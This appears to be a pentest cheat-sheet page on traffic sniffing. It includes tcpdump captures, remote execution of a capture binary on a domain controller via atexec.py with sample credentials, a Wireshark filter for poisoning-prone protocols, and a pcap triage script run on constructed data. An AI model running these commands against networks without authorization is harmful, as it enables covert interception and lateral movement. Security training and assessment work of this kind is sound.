# Sniff Traffic

## tcpdump

* <http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/home>

Linux (while connected via SSH; the BPF filter keeps your own SSH session out of the capture so it does not feed back on itself, and `-s0` disables snaplen truncation so full packets are written):

```
$ sudo tcpdump -i eth0 -w dump.pcap -s0 'not tcp port 22' &
```

Windows (download the wrapper binary, upload it to `C:\Windows\Temp` on the target, then run it remotely with Impacket's atexec.py; `-G 1800 -W 1` rotates once after 1800 seconds and then exits, so tcpdump stops itself after 30 minutes and `C:\Windows\Temp\capture.pcap` can be collected):

```
$ wget 'http://chiselapp.com/user/rkeene/repository/tcpdump-windows-wrapper/raw/tcpdump.exe?name=2e3d4d01fa597e1f50ba3ead8f18b8eeacb83812'
$ atexec.py -silentcommand megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 'C:\Windows\Temp\tcpdump.exe -G 1800 -W 1 -i 0.0.0.0 -w C:\Windows\Temp\capture.pcap'
$ sleep 30m
```

## Wireshark

* <https://wiki.wireshark.org/CaptureSetup/CapturePrivileges>
* <https://research.801labs.org/cracking-an-ntlmv2-hash/>

### Filters

Protocols to consider (broadcast/multicast and routing chatter that reveals hosts, subnets, VLAN trunking and name-resolution poisoning opportunities without sending a single packet):

* [DTP](https://en.wikipedia.org/wiki/Dynamic_Trunking_Protocol) (Dynamic Trunking Protocol)
* [OSPF](https://en.wikipedia.org/wiki/Open_Shortest_Path_First) (Open Shortest Path First)
* [SSDP](https://en.wikipedia.org/wiki/Simple_Service_Discovery_Protocol) (Simple Service Discovery Protocol)
* [ARP](https://en.wikipedia.org/wiki/Address_Resolution_Protocol) (Address Resolution Protocol)
* [LLMNR](https://en.wikipedia.org/wiki/Link-Local_Multicast_Name_Resolution) (Link-Local Multicast Name Resolution)
* [NBNS](https://en.wikipedia.org/wiki/NetBIOS_over_TCP/IP) (NetBIOS Name Service)
* [mDNS](https://en.wikipedia.org/wiki/Multicast_DNS) (Multicast DNS)
* [ICMPv6](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol_for_IPv6) (Internet Control Message Protocol version 6)
* [DHCPv6](https://en.wikipedia.org/wiki/DHCPv6) (Dynamic Host Configuration Protocol version 6)

```
dtp || ospf || ssdp || arp || llmnr || nbns || mdns || icmpv6 || dhcpv6
```

## Scapy

* <https://gist.github.com/Dfte/9cfeb87892557fd098de78f68b1b1390>

Passively detect live subnets:

```
$ sudo python3 SilentListener.py -i eth0 -o ranges.txt [--scan]
```
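As an added example (not the page's SilentListener.py nor any other project's code), the stdlib-only Python script below does offline what the Wireshark filter above and the Scapy listener do on a live interface: it walks a pcap, counts the frames that match each protocol in that filter (DTP is left out since it is not carried over IP), and derives the /24 ranges that the IPv4 sources suggest are live. The embedded capture, its addresses and MACs are constructed; pass a real pcap as the first argument to use it on a capture from the tcpdump commands above.

```python
"""Triage a pcap for the noisy protocols in the Wireshark filter above and
derive live IPv4 subnets from it, using only the standard library.
Added example, not the page's SilentListener.py; the sample pcap is CONSTRUCTED."""
import ipaddress
import struct
import sys
from collections import Counter

PCAP_MAGIC = 0xA1B2C3D4            # classic microsecond pcap; nanosecond magic not handled
ETH_ARP, ETH_IP4, ETH_IP6 = 0x0806, 0x0800, 0x86DD
IP_NAMES = {89: "ospf", 58: "icmpv6"}            # IP protocol number -> filter name
UDP_NAMES = {5355: "llmnr", 137: "nbns", 5353: "mdns", 1900: "ssdp", 546: "dhcpv6", 547: "dhcpv6"}


def classify(frame):
    """Map one Ethernet frame to (filter name or None, source IP or None)."""
    if len(frame) < 14:
        return None, None
    ethertype, = struct.unpack_from("!H", frame, 12)
    body = frame[14:]
    if ethertype == ETH_ARP and len(body) >= 28:
        return "arp", str(ipaddress.IPv4Address(body[14:18]))   # sender protocol address
    if ethertype == ETH_IP4 and len(body) >= 20:
        ihl, proto = (body[0] & 0x0F) * 4, body[9]
        src = str(ipaddress.IPv4Address(body[12:16]))
        l4 = body[ihl:]
    elif ethertype == ETH_IP6 and len(body) >= 40:
        proto = body[6]                                          # next header
        src = str(ipaddress.IPv6Address(body[8:24]))
        l4 = body[40:]
    else:
        return None, None
    if proto in IP_NAMES:
        return IP_NAMES[proto], src
    if proto == 17 and len(l4) >= 8:                             # UDP: match either port
        sport, dport = struct.unpack_from("!HH", l4, 0)
        return UDP_NAMES.get(dport) or UDP_NAMES.get(sport), src
    return None, src


def iter_frames(data):
    """Yield the captured bytes of each record in a classic pcap (linktype 1 assumed)."""
    magic, = struct.unpack_from("<I", data, 0)
    end = "<" if magic == PCAP_MAGIC else ">"   # byte-swapped magic means a big-endian file
    off = 24
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack_from(end + "IIII", data, off)
        off += 16
        yield data[off:off + incl]
        off += incl


def summarize(pcap_bytes):
    """Count filter hits and collect the /24s of IPv4 sources (0.0.0.0 is not a host)."""
    protos, subnets = Counter(), set()
    for frame in iter_frames(pcap_bytes):
        name, src = classify(frame)
        if name:
            protos[name] += 1
        if src and ":" not in src and src != "0.0.0.0":
            subnets.add(str(ipaddress.ip_network(src + "/24", strict=False)))
    return protos, sorted(subnets)


# Constructed sample capture: hypothetical addresses, zeroed checksums.
def _eth(ethertype, payload):
    return b"\xff" * 6 + b"\x00\x11\x22\x33\x44\x55" + struct.pack("!H", ethertype) + payload
def _arp(sender, target):
    hdr = struct.pack("!HHBBH", 1, ETH_IP4, 6, 4, 1)            # Ethernet/IPv4 ARP request
    return _eth(ETH_ARP, hdr + b"\x00\x11\x22\x33\x44\x55" + ipaddress.IPv4Address(sender).packed
                + b"\x00" * 6 + ipaddress.IPv4Address(target).packed)
def _udp4(src, dst, sport, dport, payload=b""):
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return _eth(ETH_IP4, ip + udp)
def _ip6(src, dst, nxt, payload):
    ip6 = struct.pack("!IHBB16s16s", 0x60000000, len(payload), nxt, 255,
                      ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed)
    return _eth(ETH_IP6, ip6 + payload)
def build_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for ts, f in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(f), len(f)) + f
    return out

SAMPLE_PCAP = build_pcap([
    _arp("10.10.10.5", "10.10.10.1"),
    _arp("10.10.20.7", "10.10.20.1"),
    _udp4("10.10.10.9", "224.0.0.252", 5355, 5355),          # LLMNR query
    _udp4("10.10.10.9", "10.10.10.255", 137, 137),           # NBNS query
    _udp4("10.10.30.4", "239.255.255.250", 49152, 1900),     # SSDP M-SEARCH
    _udp4("0.0.0.0", "255.255.255.255", 68, 67),             # DHCPv4 discover: not in the filter
    _ip6("fe80::1", "ff02::1", 58, b"\x85" + b"\x00" * 7),   # ICMPv6 router solicitation
    _ip6("fe80::2", "ff02::1:2", 17, struct.pack("!HHHH", 546, 547, 8, 0)),  # DHCPv6 solicit
])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PCAP
    protos, nets = summarize(data)
    print("filter hits:", dict(protos))
    print("live IPv4 subnets:", nets)
```

The subnet guess is deliberately crude (every IPv4 source is folded into a /24); on a real capture, cross-check it against the DHCP offers and OSPF hellos in the same file before trusting a range, and note that a DHCP discover from `0.0.0.0` is excluded precisely because it says nothing about which subnet the client will land in.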
